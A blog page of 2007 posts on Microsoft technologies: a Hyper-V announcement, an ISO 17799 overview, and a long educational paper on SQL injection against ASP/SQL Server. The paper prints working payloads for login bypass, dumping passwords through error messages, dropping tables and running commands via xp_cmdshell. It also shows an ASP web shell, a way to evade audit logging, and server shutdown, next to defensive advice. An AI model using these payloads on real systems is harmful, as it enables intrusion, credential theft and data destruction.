A pint of software

BIG DAY FOR HYPER-V!!!

apinedo — Fri, 14 Dec 2007 15:40:00 GMT

It’s a big day for Microsoft virtualization! Today, we are announcing the PUBLIC RELEASE Windows Server 2008 RC1 with Hyper-V Beta! A few highlights include:

1. Quick Migration and high availability providing solutions for planned and unplanned downtime

2. Support for running Hyper-V with Server Core in the parent partition

3. Import/Export of virtual machines

4. Hyper-V now integrated with Windows Server Manager

5. Integration components are now included in Windows Server 2008 meaning that when you install Windows Server 2008 in a Hyper-V virtual machine, Windows will automatically install the ICs.

6. VHD Tools support (compaction, expansion and inspection)

7. Emulated video card has changed from an S3 Trio video card to a more generic VESA compatible device. (This change resolves numerous video issues with non-Windows operating systems like Linux).

8. Support for up to four virtual SCSI controllers per virtual machine

9. Numerous fixes for compatibility, performance and scalability

Hyper-V Videos on Soapbox here:

Video: Symmetric Multiprocessing with Windows Server virtualization (Hyper-V)

Video: Virtual networking with Windows Server 2008 with Hyper-V

Video: Virtual storage for Windows Server 2008 with Hyper-V

New posters subset for Best Practices...

apinedo — Tue, 11 Dec 2007 15:13:00 GMT

I have posted a new subset of posters to achieve best practices in Architecture platforms, I hope you enjoy.

SQL Injection

apinedo — Tue, 19 Jun 2007 12:59:00 GMT

Abstract

This document discusses in detail the common 'SQL injection' technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. It discusses the various ways in which SQL can be 'injected' into the application and addresses some of the data validation and database lockdown issues that are related to this class of attack.

The paper is intended to be read by both developers of web applications which communicate with databases and by security professionals whose role includes auditing these web applications.

Introduction

Structured Query Language ('SQL') is a textual language used to interact with relational databases. There are many varieties of SQL; most dialects that are in common use at the moment are loosely based around SQL-92, the most recent ANSI standard. The typical unit of execution of SQL is the 'query', which is a collection of statements that typically return a single 'result set'. SQL statements can modify the structure of databases (using Data Definition Language statements, or 'DDL') and manipulate the contents of databases (using Data Manipulation Language statements, or 'DML'). In this paper, we will be specifically discussing Transact-SQL, the dialect of SQL used by Microsoft SQL Server.

SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input into an application.

A typical SQL statement looks like this:

select id, forename, surname from authors

This statement will retrieve the 'id', 'forename' and 'surname' columns from the 'authors' table, returning all rows in the table. The 'result set' could be restricted to a specific 'author' like this:

select id, forename, surname from authors where forename = 'john' and surname = 'smith'

An important point to note here is that the string literals 'john' and 'smith' are delimited with single quotes. Presuming that the 'forename' and 'surname' fields are being gathered from user-supplied input, an attacker might be able to 'inject' some SQL into this query, by inputting values into the application like this:

Forename: jo'hn

Surname: smith

The 'query string' becomes this:

select id, forename, surname from authors where forename = 'jo'hn' and

surname = 'smith'

When the database attempts to run this query, it is likely to return an error:

Server: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near 'hn'.

The reason for this is that the insertion of the 'single quote' character 'breaks out' of the single-quote delimited data. The database then tried to execute 'hn' and failed. If the attacker specified input like this:

Forename: jo'; drop table authors--

Surname:

…the authors table would be deleted, for reasons that we will go into later.

It would seem that some method of either removing single quotes from the input, or 'escaping' them in some way would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all user-supplied data is in the form of strings. If our user input could select an author by 'id' (presumably a number) for example, our query might look like this:

select id, forename, surname from authors where id=1234

In this situation an attacker can simply append SQL statements on the end of the numeric input. In other SQL dialects, various delimiters are used; in the Microsoft Jet DBMS engine, for example, dates can be delimited with the '#' character. Second, 'escaping' single quotes is not necessarily the simple cure it might initially seem, for reasons we will go into later.

We illustrate these points in further detail using a sample Active Server Pages (ASP) 'login' page, which accesses a SQL Server database and attempts to authenticate access to some fictional application.

This is the code for the 'form' page, into which the user types a username and password:

<HTML>

<HEAD>

<TITLE>Login Page</TITLE>

</HEAD>

<BODY bgcolor='000000' text='cccccc'>

<FONT Face='tahoma' color='cccccc'>

<CENTER><H1>Login</H1>

<FORM action='process_login.asp' method=post>

<TABLE>

<TR><TD>Username:</TD><TD><INPUT type=text name=username size=100%

width=100></INPUT></TD></TR>

<TR><TD>Password:</TD><TD><INPUT type=password name=password size=100% width=100></INPUT></TD></TR>

</TABLE>

<INPUT type=submit value='Submit'> <INPUT type=reset value='Reset'>

</FORM>

</FONT>

</BODY>

</HTML>

This is the code for 'process_login.asp', which handles the actual login:

<HTML>

<BODY bgcolor='000000' text='ffffff'>

<FONT Face='tahoma' color='ffffff'>

<STYLE>

p { font-size=20pt ! important}

font { font-size=20pt ! important}

h1 { font-size=64pt ! important}

</STYLE>

<%@LANGUAGE = JScript %>

function trace( str )

{

if( Request.form("debug") == "true" )

Response.write( str );

}

function Login( cn )

{

var username;

var password;

username = Request.form("username");

password = Request.form("password");

var rso = Server.CreateObject("ADODB.Recordset");

var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";

trace( "query: " + sql );

rso.open( sql, cn );

if (rso.EOF)

{

rso.close();

<FONT Face='tahoma' color='cc0000'>

<H1>

<BR><BR>

<CENTER>ACCESS DENIED</CENTER>

</H1>

</BODY>

</HTML>

Response.end

return;

}

else

{

Session("username") = "" + rso("username");

<FONT Face='tahoma' color='00cc00'>

<H1>

<CENTER>ACCESS GRANTED<BR>

<BR>

Welcome,

<% Response.write(rso("Username"));

Response.write( "</BODY></HTML>" );

Response.end

}

function Main()

{

//Set up connection

var username

var cn = Server.createobject( "ADODB.Connection" );

cn.connectiontimeout = 20;

cn.open( "localserver", "sa", "password" );

username = new String( Request.form("username") );

if( username.length > 0)

{

Login( cn );

}

cn.close();

}

Main();

The critical point here is the part of 'process_login.asp' which creates the 'query string' :

var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";

If the user specifies the following:

Username: '; drop table users--

Password:

..the 'users' table will be deleted, denying access to the application for all users. The '--' character sequence is the 'single line comment' sequence in Transact-SQL, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.

The attacker could log on as any user, given that they know the users name, using the following input:

Username: admin'--

The attacker could log in as the first user in the 'users' table, with the following input:

Username: ' or 1=1--

…and, strangely, the attacker can log in as an entirely fictional user with the following input:

Username: ' union select 1, 'fictional_user', 'some_password', 1--

The reason this works is that the application believes that the 'constant' row that the attacker specified was part of the recordset retrieved from the database.

Obtaining Information Using Error Messages

This technique was first discovered by David Litchfield and the author in the course of a penetration test; David later wrote a paper on the technique [1], and subsequent authors have referenced this work. This explanation discusses the mechanisms underlying the 'error message' technique, enabling the reader to fully understand it, and potentially originate variations of their own.

In order to manipulate the data in the database, the attacker will have to determine the structure of certain databases and tables. For example, our 'users' table might have been created with the following command:

create table users( id int,

username varchar(255),

password varchar(255),

privs int

)

..and had the following users inserted:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )

insert into users values( 0, 'guest', 'guest', 0x0000 )

insert into users values( 0, 'chris', 'password', 0x00ff )

insert into users values( 0, 'fred', 'sesame', 0x00ff )

Let's say our attacker wants to insert a user account for himself. Without knowing the structure of the 'users' table, he is unlikely to be successful. Even if he gets lucky, the significance of the 'privs' field is unclear. The attacker might insert a '1', and give himself a low - privileged account in the application, when what he was after was administrative access.

Fortunately for the attacker, if error messages are returned from the application (the default ASP behaviour) the attacker can determine the entire structure of the database, and read any value that can be read by the account the ASP application is using to connect to the SQL Server.

(The following examples use the supplied sample database and .asp scripts to illustrate how these techniques work.)

First, the attacker wants to establish the names of the tables that the query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement:

Username: ' having 1=1--

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/process_login.asp, line 35

So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:

Username: ' group by users.id having 1=1--

(which produces the error…)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/process_login.asp, line 35

Eventually the attacker arrives at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1--

… which produces no error, and is functionally equivalent to:

select * from users where username = ''

So the attacker now knows that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs', in that order.

It would be useful if he could determine the types of each column. This can be achieved using a 'type conversion' error message, like this:

Username: ' union select sum(username) from users--

This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before determining whether the number of fields in the two rowsets is equal. Attempting to calculate the 'sum' of a textual field results in this message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

/process_login.asp, line 35

..which tells us that the 'username' field has type 'varchar'. If, on the other hand, we attempt to calculate the sum() of a numeric type, we get an error message telling us that the number of fields in the two rowsets don't match:

Username: ' union select sum(id) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/process_login.asp, line 35

We can use this technique to approximately determine the type of any column of any table in the database.

This allows the attacker to create a well - formed 'insert' query, like this:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

However, the potential of the technique doesn't stop there. The attacker can take

advantage of any error message that reveals information about the environment, or the database. A list of the format strings for standard error messages can be obtained by running:

select * from master..sysmessages

Examining this list reveals some interesting messages.

One especially useful message relates to type conversion. If you attempt to convert a string into an integer, the full contents of the string are returned in the error message. In our sample login page, for example, the following 'username' will return the specific version of SQL server, and the server operating system it is running on:

Username: ' union select @@version,1,1,1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int.

/process_login.asp, line 35

This attempts to convert the built-in '@@version' constant into an integer because the first column in the 'users' table is an integer.

This technique can be used to read any value in any table in the database. Since the attacker is interested in usernames and passwords, they are likely to read the usernames from the 'users' table, like this:

Username: ' union select min(username),1,1,1 from users where username > 'a'--

This selects the minimum username that is greater than 'a', and attempts to convert it to an integer:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.

/process_login.asp, line 35

So the attacker now knows that the 'admin' account exists. He can now iterate through the rows in the table by substituting each new username he discovers into the 'where' clause:

Username: ' union select min(username),1,1,1 from users where username > 'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.

/process_login.asp, line 35

Once the attacker has determined the usernames, he can start gathering passwords:

Username: ' union select password,1,1,1 from users where username = 'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.

/process_login.asp, line 35

A more elegant technique is to concatenate all of the usernames and passwords into a single string, and then attempt to convert it to an integer. This illustrates another point; Transact-SQL statements can be string together on the same line without altering their meaning. The following script will concatenate the values:

begin declare @ret varchar(8000)

set @ret=':'

select @ret=@ret+' '+username+'/'+password from users where username>@ret

select @ret as ret into foo

end

The attacker 'logs in' with this 'username' (all on one line, obviously…)

Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--

This creates a table 'foo', which contains the single column 'ret', and puts our string into it. Normally even a low-privileged user will be able to create a table in a sample database, or the temporary database.

The attacker then selects the string from the table, as before:

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.

/process_login.asp, line 35

And then drops (deletes) the table, to tidy up:

Username: '; drop table foo--

These examples are barely scratching the surface of the flexibility of this technique. Needless to say, if the attacker can obtain rich error information from the database, their job is infinitely easier.

Leveraging Further Access

Once an attacker has control of the database, they are likely to want to use that access to obtain further control over the network. This can be achieved in a number of ways:

1. Using the xp_cmdshell extended stored procedure to run commands as the SQL server user, on the database server

2. Using the xp_regread extended stored procedure to read registry keys, potentially including the SAM (if SQL Server is running as the local system account)

3. Use other extended stored procedures to influence the server

4. Run queries on linked servers

5. Creating custom extended stored procedures to run exploit code from within the SQL Server process

6. Use the 'bulk insert' statement to read any file on the server

7. Use bcp to create arbitrary text files on the server

8. Using the sp_OACreate, sp_OAMethod and sp_OAGetProperty system stored procedures to create Ole Automation (ActiveX) applications that can do everything an ASP script can do

These are just a few of the more common attack scenarios; it is quite possible that an attacker will be able to come up with others. We present these techniques as a collection of relatively obvious SQL Server attacks, in order to show just what is possible, given the ability to inject SQL. We will deal with each of the above points in turn.

xp_cmdshell

Extended stored procedures are essentially compiled Dynamic Link Libraries (DLLs) that use a SQL Server specific calling convention to run exported functions. They allow SQL Server applications to have access to the full power of C/C++, and are an extremely useful feature. A number of extended stored procedures are built in to SQL Server, and perform various functions such as sending email and interacting with the registry.

xp_cmdshell is a built-in extended stored procedure that allows the execution of arbitrary command lines. For example:

exec master..xp_cmdshell 'dir'

will obtain a directory listing of the current working directory of the SQL Server process, and

exec master..xp_cmdshell 'net1 user'

will provide a list of all users on the machine. Since SQL server is normally running as either the local 'system' account, or a 'domain user' account, an attacker can do a great deal of harm.

xp_regread

Another helpful set of built in extended stored procedures are the xp_regXXX functions,

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

Example uses of some of these functions:

exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

(this determines what null-session shares are available on the server)

exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

(this will reveal all of the SNMP communities configured on the server. With this information, an attacker can probably reconfigure network appliances in the same area of the network, since SNMP communities tend to be infrequently changed, and shared among many hosts)

It is easy to imagine how an attacker might use these functions to read the SAM, change the configuration of a system service so that it starts next time the machine is rebooted, or run an arbitrary command the next time anyone logs on to the server.

Other Extended Stored Procedures

The xp_servicecontrol procedure allows a user to start, stop, pause and 'continue' services:

exec master..xp_servicecontrol 'start', 'schedule'

exec master..xp_servicecontrol 'start', 'server'

Here is a table of a few other useful extended stored procedures: xp_availablemedia	reveals the available drives on the machine.
xp_dirtree	allows a directory tree to be obtained
xp_enumdsn	enumerates ODBC data sources on the server
xp_loginconfig	reveals information about the security mode of the server.
xp_makecab	allows the user to create a compressed archive of files on the server (or any files the server can access)
xp_ntsec_enumdomains	enumerates domains that the server can access
xp_terminate_process	terminates a process, given its PID

Linked Servers

SQL Server provides a mechanism to allow servers to be 'linked' - that is, to allow a query on one database server to manipulate data on another. These links are stored in the master..sysservers table. If a linked server has been set up using the 'sp_addlinkedsrvlogin' procedure, a pre-authenticated link is present and the linked server can be accessed through it without having to log in. The 'openquery' function allows queries to be run against the linked server.

Custom extended stored procedures

The extended stored procedure API is a fairly simple one, and it is a fairly simple task to create an extended stored procedure DLL that carries malicious code. There are several ways to upload the DLL onto the SQL server using command lines, and there are other methods involving various communication mechanisms that can be automated, such as HTTP downloads and FTP scripts.

Once the DLL file is present on a machine that the SQL Server can access - this need not necessarily be the SQL server itself - the attacker can add the extended stored procedure using this command (in this case, our malicious stored procedure is a small, trojan web server that exports the servers filesystems):

sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

The extended stored procedure can then be run by calling it in the normal way:

exec xp_webserver

Once the procedure has been run, it can be removed like this:

sp_dropextendedproc 'xp_webserver'

Importing text files into tables

Using the 'bulk insert' statement, it is possible to insert a text file into a temporary table. Simply create the table like this:

create table foo( line varchar(8000) )

…and then run an bulk insert to insert the data from the file, like this:

bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

…the data can then be retrieved using any of the above error message techniques, or by a 'union' select, combining the data in the text file with the data that is normally returned by the application. This is useful for obtaining the source code of scripts stored on the database server, or possibly the source of ASP scripts.

Creating Text Files using BCP

It is fairly easy to create arbitrary text files using the 'opposite' technique to the 'bulk insert'. Unfortunately this requires a command line tool, 'bcp', the 'bulk copy program'

Since bcp accesses the database from outside the SQL Server process, it requires a login. This is typically not difficult to obtain, since the attacker can probably create one anyway, or take advantage of 'integrated' security mode, if the server is configured to use it.

The command line format is as follows:

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

The 'S' parameter is the server on which to run the query, the 'U' is the username and the 'P' is the password, in this case 'foobar'.

ActiveX automation scripts in SQL Server

Several built-in extended stored procedures are provided which allow the creation of ActiveX Automation scripts in SQL server. These scripts are functionally the same as scripts running in the context of the windows scripting host, or ASP scripts - they are typically written in VBScript or JavaScript, and they create Automation objects and interact with them. An automation script written in Transact-SQL in this way can do anything that an ASP script, or a WSH script can do. A few examples are provided here for illustration purposes

1) This example uses the 'wscript.shell' object to create an instance of notepad (this could of course be any command line):

-- wscript.shell example

declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

It could be run in our sample scenario by specifying the following username (all on one line):

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

2) This example uses the 'scripting.filesystemobject' object to read a known text file:

-- scripting.filesystemobject example - read a known file

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1

exec @ret = sp_oamethod @f, 'readline', @line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_oamethod @f, 'readline', @line out

end

3) This example creates an ASP script that will run any command passed to it in the querystring:

-- scripting.filesystemobject example - create a 'run this' .asp file

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,

'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

It is important to note that when running on a Windows NT4, IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account.

4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak:

declare @o int, @ret int

exec sp_oacreate 'speech.voicetext', @o out

exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'

exec sp_oasetproperty @o, 'speed', 150

exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528

waitfor delay '00:00:05'

This could of course be run in our example scenario, by specifying the following 'username' (note that the example is not only injecting a script, but simultaneously logging in to the application as 'admin'):

Username: admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--

Stored Procedures

Traditional wisdom holds that if an ASP application uses stored procedures in the database, that SQL injection is not possible. This is a half-truth, and it depends on the manner in which the stored procedure is called from the ASP script.

Essentially, if a parameterised query is run, and the user-supplied parameters are passed safely to the query, then SQL injection is typically impossible. However, if the attacker can exert any influence over the non - data parts of the query string that is run, it is likely that they will be able to control the database.

Good general rules are:

• If the ASP script creates a SQL query string that is submitted to the server, it is vulnerable to SQL injection, *even if* it uses stored procedures

• If the ASP script uses a procedure object that wraps the assignment of parameters to a stored procedure (such as the ADO command object, used with the Parameters collection) then it is generally safe, though this depends on the object's implementation.

Obviously, best practice is still to validate all user supplied input, since new attack techniques are being discovered all the time.

To illustrate the stored procedure query injection point, execute the following SQL string:

sp_who '1' select * from sysobjects

sp_who '1'; select * from sysobjects

Either way, the appended query is still run, after the stored procedure.

Advanced SQL Injection

It is often the case that a web application will 'escape' the single quote character (and others), and otherwise 'massage' the data that is submitted by the user, such as by limiting its length.

In this section, we discuss some techniques that help attackers bypass some of the more obvious defences against SQL injection, and evade logging to a certain extent.

Strings without quotes

Occasionally, developers may have protected an application by (say) escaping all 'single quote' characters, perhaps by using the VBScript 'replace' function or similar:

function escape( input )

input = replace(input, "'", "''")

escape = input

end function

Admittedly, this will prevent all of the example attacks from working on our sample site, and removing ';' characters would also help a lot. However, in a larger application it is likely that several values that the user is supposed to input will be numeric. These values will not require 'delimiting', and so may provide a point at which the attacker can insert SQL.

If the attacker wishes to create a string value without using quotes, they can use the 'char' function. For example:

insert into users values( 666,

char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

0xffff)

…is a query containing no quote characters, which will insert strings into a table.

Of course, if the attacker doesn't mind using a numeric username and password, the following statement would do just as well:

insert into users values( 667,

123,

0xffff)

Since SQL Server automatically converts integers into 'varchar' values, the type conversion is implicit.

Second-Order SQL Injection

Even if an application always escapes single - quotes, an attacker can still inject SQL as long as data in the database is re-used by the application.

For example, an attacker might register with an application, creating a username

Username: admin'--

Password: password

The application correctly escapes the single quote, resulting in an 'insert' statement like this:

insert into users values( 123, 'admin''--', 'password', 0xffff )

Let's say the application allows a user to change their password. The ASP script code first ensures that the user has the 'old' password correct before setting the new password. The code might look like this:

username = escape( Request.form("username") );

oldpassword = escape( Request.form("oldpassword") );

newpassword = escape( Request.form("newpassword") );

var rso = Server.CreateObject("ADODB.Recordset");

var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";

rso.open( sql, cn );

if (rso.EOF)

{

…

The query to set the new password might look like this:

sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"

rso("username") is the username retrieved from the 'login' query.

Given the username admin'--, the query produces the following query:

update users set password = 'password' where username = 'admin'--'

The attacker can therefore set the admin password to the value of their choice, by registering as a user called admin'--.

This is a dangerous problem, present in most large applications that attempt to 'escape' data. The best solution is to reject bad input, rather than simply attempting to modify it. This can occasionally lead to problems, however, where 'known bad' characters are necessary, as (for example) in the case of names with apostrophes; for example

O'Brien

From a security perspective, the best way to solve this is to simply live with the fact that single-quotes are not permitted. If this is unacceptable, they will have to be 'escaped'; in this case, it is best to ensure that all data that goes into a SQL query string (including data obtained from the database) is correctly handled.

Attacks of this form are also possible if the attacker can somehow insert data into the system without using the application; the application might have an email interface, or perhaps an error log is stored in the database that the attacker can exert some control over. It is always best to verify *all* data, including data that is already in the system - the validation functions should be relatively simple to call, for example

if ( not isValid( "email", request.querystring("email") ) then

response.end

..or something similar.

Length Limits

Sometimes the length of input data is restricted in order to make attacks more difficult; while this does obstruct some types of attack, it is possible to do quite a lot of harm in a very small amount of SQL. For example, the username

Username: ';shutdown--

...will shut down the SQL server instance, using only 12 characters of input. Another example is

drop table <tablename>

Another problem with limiting input data length occurs if the length limit is applied after the string has been 'escaped'. If the username was limited to (say) 16 characters, and the password was also limited to 16 characters, the following username/password combination would execute the 'shutdown' command mentioned above:

Username: aaaaaaaaaaaaaaa'

Password: '; shutdown--

The reason is that the application attempts to 'escape' the single - quote at the end of the username, but the string is then cut short to 16 characters, deleting the 'escaping' single quote. The net result is that the password field can contain some SQL, if it begins with a single - quote, since the query ends up looking like this:

select * from users where username='aaaaaaaaaaaaaaa'' and password='''; shutdown--

Effectively, the username in the query has become

aaaaaaaaaaaaaaa' and password='

…so the trailing SQL runs.

Audit Evasion

SQL Server includes a rich auditing interface in the sp_traceXXX family of functions, which allow the logging of various events in the database. Of particular interest here are the T-SQL events, which log all of the SQL statements and 'batches' that are prepared and executed on the server. If this level of audit is enabled, all of the injected SQL queries we have discussed will be logged and a skilled database administrator will be able to see what has happened. Unfortunately, if the attacker appends the string

sp_password

to a the Transact-SQL statement, this audit mechanism logs the following:

-- 'sp_password' was found in the text of this event.

-- The text has been replaced with this comment for security reasons.

This behaviour occurs in all T-SQL logging, even if 'sp_password' occurs in a comment. This is, or course, intended to hide the plaintext passwords of users as they pass through sp_password, but it is quite a useful behaviour for an attacker.

So, in order to hide all of the injection the attacker needs to simply append sp_password after the '--' comment characters, like this:

Username: admin'--sp_password

The fact that some SQL has run will be logged, but the query string itself will be conveniently absent from the log.

Defences

This section discusses some defences against the described attacks. Input validation is discussed, and some sample code provided, then we address SQL server lockdown issues.

Input Validation

Input validation can be a complex subject. Typically, too little attention is paid to it in a development project, since overenthusiastic validation tends to cause parts of an application to break, and the problem of input validation can be difficult to solve. Input validation tends not to add to the functionality of an application, and thus it is generally overlooked in the rush to meet imposed deadlines.

The following is a brief discussion of input validation, with sample code. This sample code is (of course) not intended to be directly used in applications, but it does illustrate the differing strategies quite well.

The different approaches to data validation can be categorised as follows:

1) Attempt to massage data so that it becomes valid

2) Reject input that is known to be bad

3) Accept only input that is known to be good

Solution (1) has a number of conceptual problems; first, the developer is not necessarily aware of what constitutes 'bad' data, because new forms of 'bad data' are being discovered all the time. Second, 'massaging' the data can alter its length, which can result in problems as described above. Finally, there is the problem of second-order effects involving the reuse of data already in the system.

Solution (2) suffers from some of the same issues as (1); 'known bad' input changes over time, as new attack techniques develop.

Solution (3) is probably the better of the three, but can be harder to implement.

Probably the best approach from a security point of view is to combine approaches (2) and (3) - allow only good input, and then search that input for known 'bad' data.

A good example of the necessity to combine these two approaches is the problem of hyphenated surnames :

Quentin Bassington-Bassington

We must allow hyphens in our 'good' input, but we are also aware that the character sequence '--' has significance to SQL server.

Another problem occurs when combining the 'massaging' of data with validation of character sequences - for example, if we apply a 'known bad' filter that detects '--', 'select' and 'union' followed by a 'massaging' filter that removes single-quotes, the attacker could specify input like

uni'on sel'ect @@version-'-

Since the single-quote is removed after the 'known bad' filter is applied, the attacker can simply intersperse single quotes in his known-bad strings to evade detection.

Here is some example validation code.

Approach 1 - Escape singe quotes

function escape( input )

input = replace(input, "'", "''")

escape = input

end function

Approach 2 - Reject known bad input

function validate_string( input )

known_bad = array( "select", "insert", "update", "delete", "drop", "--", "'" )

validate_string = true

for i = lbound( known_bad ) to ubound( known_bad )

if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then

validate_string = false

exit function

end if

next

end function

Approach 3 - Allow only good input

function validatepassword( input )

good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

validatepassword = true

for i = 1 to len( input )

c = mid( input, i, 1 )

if ( InStr( good_password_chars, c ) = 0 ) then

validatepassword = false

exit function

end if

next

end function

SQL Server Lockdown

The most important point here is that it *is* necessary to 'lock down' SQL server; it is not secure 'out of the box'. Here is a brief list of things to do when creating a SQL Server build:

1. Determine methods of connection to the server

a. Verify that only the network libraries you're using are enabled, using the 'Network utility'

2. Verify which accounts exist

a. Create 'low privileged' accounts for use by applications

b. Remove unnecessary accounts

c. Ensure that all accounts have strong passwords; run a password auditing script (such as the one provided as an appendix to this paper) against the server on a regular basis

3. Verify which objects exist

a. Many extended stored procedures can be removed safely. If this is done, consider removing the '.dll' file containing the extended stored procedure code.

b. Remove all sample databases - the 'northwind' and 'pubs' databases, for example.

4. Verify which accounts can access which objects

a. The account that an application uses to access the database should have only the minimum permissions necessary to access the objects that it needs to use.

5. Verify the patch level of the server

a. There are several buffer overflow [3], [4] and format string [5] attacks against SQL Server (mostly discovered by the author) as well as several other 'patched' security issues. It is likely that more exist.

6. Verify what will be logged, and what will be done with the logs.

Microsoft and the AS 7799/ISO 17799 Standards for Information Security Management

apinedo — Wed, 09 May 2007 17:41:00 GMT

What is Information Security?

Information and the systems and processes supporting it are key organisational assets. Information Security is about ensuring the confidentiality, availability and integrity of that information and ensuring that privacy issues are addressed as required to support the achievement of the organisation’s objectives.

Why is Information Security important to me?

The Information Systems that have brought so many improvements and efficiencies have also brought us new risks. Dependence on information systems increases the impact of successful attacks or other security incidents. At the same time, the interconnection of public and private networks and the trend to distributed computing is makes it more challenging to secure systems from unauthorised access and attack. Effective protection requires a comprehensive system – incorporating appropriate management and procedures as well as a robust risk management regime.

What are the AS 7799 and ISO 17799 standards?

Australian Standard, AS/NZS 7799.2:2003, details a risk based Information Security Management System, which can be used by organisations of all sizes, in both the public and private sectors. International Standard, ISO/IEC 17799:2005, outlines the accepted best practice for security management and offers guidelines on how these security measures should be implemented. In combination, these Standards provide a framework for the management of information and computer system security within an organisation.

Recent revision of ISO 17799:2005

ISO 17799 was revised in June 2005 to address over 4,000 comments that had been received since the 2001 issue and present a more logical structure for implementation. The most significant changes were: the introduction of a new control objective for managing security incidents; the reorganisation of human resources security into before, during and on termination of employment and additional controls for handling relationships with third parties. A number of existing controls were consolidated and new controls added to address issues such as acceptable usage and on-line transactions. A revision of AS 7799 is expected in 2006 to reflect the revised structure.

This diagram illustrates the revisions to the ISO 17799:2005 control objectives

What is an Information Security Management System?

An Information Security Management System or ISMS is the key set of processes that are required to support effective information security throughout an organisation. Key components of the ISMS include; a high level Security Policy that states the organisation’s objectives for information security, a Risk Assessment of the critical information assets and a ‘Statement of Applicability’, which documents how compliance is achieved against the Standard’s controls. The implementation of the ISMS follows the concept of the Plan, Do, Check Act cycle, common in other management systems, such as ISO 9001 and ISO 14001.

This diagram demonstrates the Plan, Do, Check, and Act lifecycle of an ISMS

How can AS 7799 and ISO 17799 help me?

